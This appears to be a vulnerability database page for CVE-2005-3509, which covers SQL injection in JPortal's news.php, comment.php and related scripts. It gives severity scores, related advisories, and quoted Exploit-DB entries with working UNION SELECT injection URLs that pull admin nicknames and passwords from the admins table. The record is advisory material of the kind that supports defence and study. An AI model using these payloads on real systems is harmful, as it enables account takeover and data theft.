CVE-2005-3509
published 2005-11-06CVE-2005-3509: Multiple SQL injection vulnerabilities in JPortal allow remote attackers to execute arbitrary SQL commands via (1) banner.php or the id parameter to (2)…
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.17%
63.5th percentile
Multiple SQL injection vulnerabilities in JPortal allow remote attackers to execute arbitrary SQL commands via (1) banner.php or the id parameter to (2) print.php, (3) comment.php, and (4) news.php.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jportal | jportal | — | — |
| jportal | jportal_web_portal | — | — |
| jportal | jportal_web_portal | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-g3hr-vmq3-73w8: SQL injection vulnerability in humor
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2008-6451 [HIGH] CWE-89 GHSA-g3hr-vmq3-73w8: SQL injection vulnerability in humor
SQL injection vulnerability in humor.php in jPORTAL 2 allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: this might overlap CVE-2004-2036 or CVE-2005-3509.
GHSA
GHSA-6x8c-5x8p-83f7: Multiple SQL injection vulnerabilities in JPortal allow remote attackers to execute arbitrary SQL commands via (1) banner
ghsa_unreviewed·2022-05-01
CVE-2005-3509 [HIGH] GHSA-6x8c-5x8p-83f7: Multiple SQL injection vulnerabilities in JPortal allow remote attackers to execute arbitrary SQL commands via (1) banner
Multiple SQL injection vulnerabilities in JPortal allow remote attackers to execute arbitrary SQL commands via (1) banner.php or the id parameter to (2) print.php, (3) comment.php, and (4) news.php.
No detection rules found.
Exploit-DB
JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection
exploitdb·2005-11-04
CVE-2005-3509 JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection
JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection
---
source: https://www.securityfocus.com/bid/15324/info
JPortal is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being used in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
http://www.example.com/news.php?id=%20AND%200%20=%201%20UNION%20SELECT%20*,%201,%201,%201,%201%20FROM%20admins%20--
Exploit-DB
JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection
exploitdb·2005-11-04
CVE-2005-3509 JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection
JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection
---
source: https://www.securityfocus.com/bid/15324/info
JPortal is prone to multiple SQL injection vulnerabilities. These are due to a lack of proper sanitization of user-supplied input before being used in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
http://www.example.com/comment.php?what=news&id=
and 1=0 union (select null, null, nick, null, null, null, null, null, null,
null, null, null from admins limit n,1)
got admin nick
http://www.example.com/comment.php?what=news&id=
and 1=0 union (select null, null, pass, null, null, null, null, null, null,
n
No writeups or analysis indexed.
http://foro.elhacker.net/index.php?topic=93436.0http://www.security.nnov.ru/Kdocument105.htmlhttp://www.securityfocus.com/bid/15324http://www.vupen.com/english/advisories/2005/2310http://foro.elhacker.net/index.php?topic=93436.0http://www.security.nnov.ru/Kdocument105.htmlhttp://www.securityfocus.com/bid/15324http://www.vupen.com/english/advisories/2005/2310
2005-11-06
Published